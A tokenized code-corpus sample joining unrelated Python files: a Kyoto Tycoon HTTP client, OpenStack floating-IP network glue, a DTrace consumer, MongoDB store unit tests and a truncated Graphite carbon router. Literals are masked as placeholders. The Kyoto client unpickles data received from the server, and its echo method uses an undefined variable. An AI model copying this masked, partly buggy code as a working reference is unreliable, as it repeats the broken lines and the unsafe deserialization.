<s> import httplib <EOL> import urllib <EOL> import struct <EOL> import time <EOL> import kt_error <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> KT_HTTP_HEADER = { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT>' , <EOL> } <EOL> KT_PACKER_CUSTOM = <NUM_LIT:0> <EOL> KT_PACKER_PICKLE = <NUM_LIT:1> <EOL> KT_PACKER_JSON = <NUM_LIT:2> <EOL> KT_PACKER_STRING = <NUM_LIT:3> <EOL> class ProtocolHandler : <EOL> def __init__ ( self , pickle_protocol = <NUM_LIT:2> ) : <EOL> self . err = kt_error . KyotoTycoonError ( ) <EOL> self . pickle_protocol = pickle_protocol <EOL> self . pack = self . _pickle_packer <EOL> self . unpack = self . _pickle_unpacker <EOL> self . pack_type = KT_PACKER_PICKLE <EOL> def error ( self ) : <EOL> return self . err <EOL> def open ( self , host , port , timeout ) : <EOL> try : <EOL> self . conn = httplib . HTTPConnection ( host , port , timeout ) <EOL> except Exception , e : <EOL> raise e <EOL> return True <EOL> def close ( self ) : <EOL> try : <EOL> self . conn . close ( ) <EOL> except Exception , e : <EOL> raise e <EOL> return True <EOL> def echo ( self ) : <EOL> self . conn . request ( '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def get ( self , key , db = None ) : <EOL> if key is None : <EOL> return False <EOL> path = key <EOL> if db : <EOL> path = '<STR_LIT>' % ( db , key ) <EOL> path = urllib . quote ( path . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> self . conn . request ( '<STR_LIT:GET>' , path ) <EOL> rv = self . conn . getresponse ( ) <EOL> body = rv . read ( ) <EOL> if rv . status == <NUM_LIT> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return self . unpack ( body ) <EOL> def set_bulk ( self , kv_dict , expire , atomic , db ) : <EOL> if not isinstance ( kv_dict , dict ) : <EOL> return False <EOL> if len ( kv_dict ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> request_body = '<STR_LIT>' <EOL> if atomic : <EOL> request_body = '<STR_LIT>' <EOL> for k , v in kv_dict . items ( ) : <EOL> k = urllib . quote ( k , safe = '<STR_LIT>' ) <EOL> v = urllib . quote ( self . pack ( v ) , safe = '<STR_LIT>' ) <EOL> request_body += '<STR_LIT:_>' + k + '<STR_LIT:\t>' + v + '<STR_LIT:\n>' <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return int ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def remove_bulk ( self , keys , atomic , db ) : <EOL> if not isinstance ( keys , list ) : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return <NUM_LIT:0> <EOL> if len ( keys ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return <NUM_LIT:0> <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> request_body = '<STR_LIT>' <EOL> if atomic : <EOL> request_body = '<STR_LIT>' <EOL> for key in keys : <EOL> request_body += '<STR_LIT:_>' + urllib . quote ( key , safe = '<STR_LIT>' ) + '<STR_LIT>' <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return int ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def get_bulk ( self , keys , atomic , db ) : <EOL> if not isinstance ( keys , list ) : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return None <EOL> if len ( keys ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return { } <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> request_body = '<STR_LIT>' <EOL> if atomic : <EOL> request_body = '<STR_LIT>' <EOL> for key in keys : <EOL> request_body += '<STR_LIT:_>' + urllib . quote ( key , safe = '<STR_LIT>' ) + '<STR_LIT>' <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> rv = { } <EOL> res_dict = self . _tsv_to_dict ( body ) <EOL> n = res_dict . pop ( '<STR_LIT>' ) <EOL> if n == <NUM_LIT:0> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> for k , v in res_dict . items ( ) : <EOL> if v is not None : <EOL> rv [ urllib . unquote ( k [ <NUM_LIT:1> : ] ) ] = self . unpack ( urllib . unquote ( v ) ) <EOL> self . err . set_success ( ) <EOL> return rv <EOL> def get_int ( self , key , db = None ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = key <EOL> if db : <EOL> path = '<STR_LIT>' % ( db , key ) <EOL> path = urllib . quote ( path . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> self . conn . request ( '<STR_LIT:GET>' , path ) <EOL> rv = self . conn . getresponse ( ) <EOL> buf = rv . read ( ) <EOL> if rv . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return struct . unpack ( '<STR_LIT>' , buf ) [ <NUM_LIT:0> ] <EOL> def vacuum ( self , db ) : <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> path += '<STR_LIT>' + db <EOL> self . conn . request ( '<STR_LIT:GET>' , path ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> self . err . set_success ( ) <EOL> return res . status == <NUM_LIT:200> <EOL> def match_prefix ( self , prefix , max , db ) : <EOL> if prefix is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return None <EOL> rv = [ ] <EOL> request_dict = { } <EOL> request_dict [ '<STR_LIT>' ] = prefix <EOL> if max : <EOL> request_dict [ '<STR_LIT>' ] = max <EOL> if db : <EOL> request_dict [ '<STR_LIT>' ] = db <EOL> request_body = self . _dict_to_tsv ( request_dict ) <EOL> self . conn . request ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> body = request_body , headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> res_dict = self . _tsv_to_dict ( body ) <EOL> n = res_dict . pop ( '<STR_LIT>' ) <EOL> if n == <NUM_LIT:0> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return None <EOL> for k in res_dict . keys ( ) : <EOL> rv . append ( k [ <NUM_LIT:1> : ] ) <EOL> self . err . set_success ( ) <EOL> return rv <EOL> def match_regex ( self , regex , max , db ) : <EOL> if regex is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return None <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> request_dict = { '<STR_LIT>' : regex } <EOL> if max : <EOL> request_dict [ '<STR_LIT>' ] = max <EOL> request_body = self . _dict_to_tsv ( request_dict ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> rv = [ ] <EOL> res_dict = self . _tsv_to_dict ( body ) <EOL> if res_dict . pop ( '<STR_LIT>' ) < <NUM_LIT:1> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return [ ] <EOL> for k in res_dict . keys ( ) : <EOL> rv . append ( k [ <NUM_LIT:1> : ] ) <EOL> self . err . set_success ( ) <EOL> return rv <EOL> def set ( self , key , value , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> value = self . pack ( value ) <EOL> self . err . set_success ( ) <EOL> status = self . _rest_put ( '<STR_LIT>' , key , value , expire ) <EOL> if status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def add ( self , key , value , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> value = self . pack ( value ) <EOL> status = self . _rest_put ( '<STR_LIT>' , key , value , expire ) <EOL> if status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def cas ( self , key , old_val , new_val , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> request_dict = { '<STR_LIT:key>' : key } <EOL> if old_val : <EOL> request_dict [ '<STR_LIT>' ] = urllib . quote ( self . pack ( old_val ) , safe = '<STR_LIT>' ) <EOL> if new_val : <EOL> request_dict [ '<STR_LIT>' ] = urllib . quote ( self . pack ( new_val ) , safe = '<STR_LIT>' ) <EOL> if expire : <EOL> request_dict [ '<STR_LIT>' ] = expire <EOL> request_body = self . _dict_to_tsv ( request_dict ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def remove ( self , key , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> self . conn . request ( '<STR_LIT>' , key ) <EOL> rv = self . conn . getresponse ( ) <EOL> body = rv . read ( ) <EOL> if rv . status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def replace ( self , key , value , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> value = self . pack ( value ) <EOL> status = self . _rest_put ( '<STR_LIT:replace>' , key , value , expire ) <EOL> if status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def append ( self , key , value , expire , db ) : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> if key is None : <EOL> return False <EOL> elif not isinstance ( value , str ) : <EOL> return False <EOL> if self . pack_type == KT_PACKER_PICKLE : <EOL> data = self . get ( key ) <EOL> if data is None : <EOL> data = value <EOL> else : <EOL> data = data + value <EOL> if self . set ( key , data , expire , db ) is True : <EOL> self . err . set_success ( ) <EOL> return True <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> def increment ( self , key , delta , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> delta = int ( delta ) <EOL> request_body = '<STR_LIT>' % ( key , delta ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return int ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def increment_double ( self , key , delta , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> delta = float ( delta ) <EOL> request_body = '<STR_LIT>' % ( key , delta ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return float ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def report ( self ) : <EOL> self . conn . request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return self . _tsv_to_dict ( body ) <EOL> def status ( self , db = None ) : <EOL> url = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> url += '<STR_LIT>' + db <EOL> self . conn . request ( '<STR_LIT:GET>' , url ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return self . _tsv_to_dict ( body ) <EOL> def clear ( self , db = None ) : <EOL> url = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> url += '<STR_LIT>' + db <EOL> self . conn . request ( '<STR_LIT:GET>' , url ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def count ( self , db = None ) : <EOL> st = self . status ( db ) <EOL> if st is None : <EOL> return None <EOL> return int ( st [ '<STR_LIT:count>' ] ) <EOL> def size ( self , db = None ) : <EOL> st = self . status ( db ) <EOL> if st is None : <EOL> return None <EOL> return int ( st [ '<STR_LIT:size>' ] ) <EOL> def _dict_to_tsv ( self , dict ) : <EOL> return '<STR_LIT:\n>' . join ( k + '<STR_LIT:\t>' + str ( v ) for ( k , v ) in dict . items ( ) ) <EOL> def _tsv_to_dict ( self , tsv_str ) : <EOL> rv = { } <EOL> for row in tsv_str . split ( '<STR_LIT:\n>' ) : <EOL> kv = row . split ( '<STR_LIT:\t>' ) <EOL> if len ( kv ) == <NUM_LIT:2> : <EOL> rv [ kv [ <NUM_LIT:0> ] ] = kv [ <NUM_LIT:1> ] <EOL> return rv <EOL> def _rest_put ( self , operation , key , value , expire ) : <EOL> headers = { '<STR_LIT>' : operation } <EOL> if expire != None : <EOL> expire = int ( time . time ( ) ) + expire ; <EOL> headers [ "<STR_LIT>" ] = str ( expire ) <EOL> self . conn . request ( '<STR_LIT>' , key , value , headers ) <EOL> rv = self . conn . getresponse ( ) <EOL> body = rv . read ( ) <EOL> return rv . status <EOL> def _pickle_packer ( self , data ) : <EOL> return pickle . dumps ( data , self . pickle_protocol ) <EOL> def _pickle_unpacker ( self , data ) : <EOL> return pickle . loads ( data ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from nova import compute <EOL> from occi_os_api . nova_glue import vm <EOL> NETWORK_API = compute . API ( ) . network_api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def get_network_details ( uid , context ) : <EOL> """<STR_LIT>""" <EOL> vm_instance = vm . get_vm ( uid , context ) <EOL> result = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> try : <EOL> net_info = NETWORK_API . get_instance_nw_info ( context , vm_instance ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> LOG . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return result <EOL> gw = net_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT:address>' ] <EOL> mac = net_info [ '<STR_LIT:address>' ] <EOL> if len ( net_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) == <NUM_LIT:0> : <EOL> tmp = { '<STR_LIT>' : [ ] , '<STR_LIT:address>' : '<STR_LIT>' } <EOL> else : <EOL> tmp = net_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> for item in tmp [ '<STR_LIT>' ] : <EOL> result [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:address>' : item [ '<STR_LIT:address>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> result [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : mac , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:address>' : tmp [ '<STR_LIT:address>' ] , <EOL> '<STR_LIT>' : gw , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return result <EOL> def add_floating_ip ( uid , pool_name , context ) : <EOL> """<STR_LIT>""" <EOL> vm_instance = vm . get_vm ( uid , context ) <EOL> tmp = NETWORK_API . get_instance_nw_info ( context , vm_instance ) [ <NUM_LIT:0> ] <EOL> fixed_ip = tmp . fixed_ips ( ) [ <NUM_LIT:0> ] [ '<STR_LIT:address>' ] <EOL> float_address = NETWORK_API . allocate_floating_ip ( context , pool_name ) <EOL> try : <EOL> address = fixed_ip <EOL> NETWORK_API . associate_floating_ip ( context , vm_instance , <EOL> float_address , address ) <EOL> except Exception as e : <EOL> raise AttributeError ( e . message ) <EOL> return float_address <EOL> def remove_floating_ip ( uid , address , context ) : <EOL> """<STR_LIT>""" <EOL> vm_instance = vm . get_vm ( uid , context ) <EOL> try : <EOL> NETWORK_API . disassociate_floating_ip ( context , vm_instance , address ) <EOL> NETWORK_API . release_floating_ip ( context , address ) <EOL> except Exception as e : <EOL> raise AttributeError ( e . message ) </s>
<s> """<STR_LIT>""" <EOL> from dtrace import DTraceConsumer <EOL> SCRIPT = '<STR_LIT>' <EOL> def my_walk ( action , identifier , key , values ) : <EOL> """<STR_LIT>""" <EOL> print key <EOL> for item in values : <EOL> if item [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] > <NUM_LIT:0> and item [ <NUM_LIT:1> ] > <NUM_LIT:0> : <EOL> print '<STR_LIT>' % ( item [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , item [ <NUM_LIT:1> ] ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> consumer = DTraceConsumer ( walk_func = my_walk ) <EOL> consumer . run ( SCRIPT , <NUM_LIT:10> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import mox <EOL> import unittest <EOL> from pymongo import MongoClient <EOL> from pymongo . collection import Collection <EOL> from pymongo . database import Database <EOL> from suricate . data import object_store <EOL> class ObjectStoreTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_for_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . list_objects , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . create_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:foo>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . retrieve_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:abc>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . update_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:abc>' , '<STR_LIT:bar>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . delete_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:abc>' ) <EOL> class MongoStoreTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> mocker = mox . Mox ( ) <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cut = Wrapper ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT:foo>' ) <EOL> self . mongo_client = self . mocker . CreateMock ( MongoClient ) <EOL> self . mongo_db = self . mocker . CreateMock ( Database ) <EOL> self . mongo_coll = self . mocker . CreateMock ( Collection ) <EOL> self . cut . client = self . mongo_client <EOL> def test_list_objects_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . find ( { } ) . AndReturn ( [ { '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ ] } , <EOL> '<STR_LIT:content>' : '<STR_LIT:bar>' } ] ) <EOL> self . mocker . ReplayAll ( ) <EOL> tmp = self . cut . list_objects ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mocker . VerifyAll ( ) <EOL> self . assertListEqual ( tmp , [ ( '<STR_LIT:foo>' , { '<STR_LIT>' : [ ] } ) ] ) <EOL> def test_create_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . insert ( { '<STR_LIT:value>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:name>' : '<STR_LIT:foo>' } } ) . AndReturn ( '<STR_LIT>' ) <EOL> self . mocker . ReplayAll ( ) <EOL> tmp = self . cut . create_object ( '<STR_LIT>' , '<STR_LIT:abc>' , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <EOL> meta = { '<STR_LIT>' : [ ] , '<STR_LIT:name>' : '<STR_LIT:foo>' } ) <EOL> self . mocker . VerifyAll ( ) <EOL> self . assertEquals ( tmp , '<STR_LIT>' ) <EOL> def test_retrieve_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . find_one ( mox . IsA ( dict ) ) . AndReturn ( { '<STR_LIT>' : None , <EOL> '<STR_LIT:value>' : <EOL> { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> self . mocker . ReplayAll ( ) <EOL> tmp = self . cut . retrieve_object ( '<STR_LIT>' , '<STR_LIT:abc>' , <EOL> '<STR_LIT>' ) <EOL> self . mocker . VerifyAll ( ) <EOL> self . assertEquals ( tmp , { '<STR_LIT:value>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> def test_update_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . update ( mox . IsA ( dict ) , mox . IsA ( dict ) , upsert = False ) <EOL> self . mocker . ReplayAll ( ) <EOL> self . cut . update_object ( '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT>' , <EOL> { '<STR_LIT:a>' : <NUM_LIT> } ) <EOL> self . mocker . VerifyAll ( ) <EOL> def test_delete_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . remove ( mox . IsA ( dict ) ) <EOL> self . mocker . ReplayAll ( ) <EOL> self . cut . delete_object ( '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT>' ) <EOL> self . mocker . VerifyAll ( ) <EOL> class CDMIStoreTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_sth_for_success ( self ) : <EOL> pass <EOL> class Wrapper ( object_store . MongoStore ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , uri ) : <EOL> pass </s>
<s> import imp <EOL> from carbon . relayrules import loadRelayRules <EOL> from carbon . hashing import ConsistentHashRing <EOL> class DatapointRouter : <EOL> "<STR_LIT>" <EOL> def addDestination ( self , destination ) : <EOL> "<STR_LIT>" <EOL> def removeDestination ( self , destination ) : <EOL> "<STR_LIT>" <EOL> def getDestinations ( self , key ) : <EOL> """<STR_LIT>""" <EOL> class RelayRulesRouter ( DatapointRouter ) : <EOL> def __init__ ( self , rules_path ) : <EOL> self . rules_path = rules_path <EOL> self . rules = loadRelayRules ( rules_path ) <EOL> self . destinations = set ( ) <EOL> def addDestination ( self , destination ) : <EOL> self . destinations . add ( destination ) <EOL> def removeDestination ( self , destination ) : <EOL> self . destinations . discard ( destination ) <EOL> def getDestinations ( self , key ) : <EOL> for rule in self . rules : <EOL> if rule . matches ( key ) : <EOL> for destination in rule . destinations : <EOL> if destination in self . destinations : <EOL> yield destination <EOL> if not rule . continue_matching : <EOL> return <EOL> class ConsistentHashingRouter ( DatapointRouter ) : <EOL> def __init__ ( self , replication_factor = <NUM_LIT:1> ) : <EOL> self . replication_factor = int ( replication_factor ) <EOL> self . instance_ports = { } <EOL> self . ring = ConsistentHashRing ( [ ] ) <EOL> def addDestination ( self , destination ) : <EOL> ( server , port , instance ) = destination <EOL> if ( server , instance ) in self . instance_ports : <EOL> raise Exception ( "<STR_LIT>" % ( server , instance ) ) <EOL> self . instance_ports [ ( server , instance ) ] = port <EOL> self . ring . add_node ( ( server , instance ) ) <EOL> def removeDestination ( self , destination ) : <EOL> ( server , port , instance ) = destination <EOL> if ( server , instance ) not in self . instance_ports : <EOL> raise Exception ( "<STR_LIT>" % ( server , instance ) ) <EOL> del self . instance_ports [ ( server , instance ) ] <EOL> self . ring . remove_node ( ( server , instance ) ) <EOL> def getDestinations ( self , metric ) : <EOL> key = self . getKey ( metric ) <EOL> used_servers = set ( ) <EOL> for ( server , instance ) in self . ring . get_nodes ( key ) : <EOL> if server in used_servers : <EOL> continue <EOL> else : <EOL> used_servers . add ( server ) <EOL> port = self . instance_ports [ ( server , instance ) ] <EOL> yield ( server , port , instance ) <EOL> if len ( used_servers ) >= self . replication_factor : <EOL> return <EOL> def getKey ( self , metric ) : <EOL> return metric <EOL> def setKeyFunction ( self , func ) : <EOL> self . getKey = func <EOL> def setKeyFunctionFromModule ( self , keyfunc_spec ) : <EOL> module_path , func_name = keyfunc_spec . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> module_file = open ( module_path , '<STR_LIT>' ) <EOL> description = ( '<STR_LIT>' , '<STR_LIT>' , imp . PY_SOURCE ) <EOL> module = imp . load_module ( '<STR_LIT>' , module_file , module_path , description ) <EOL> keyfunc = getattr ( module , 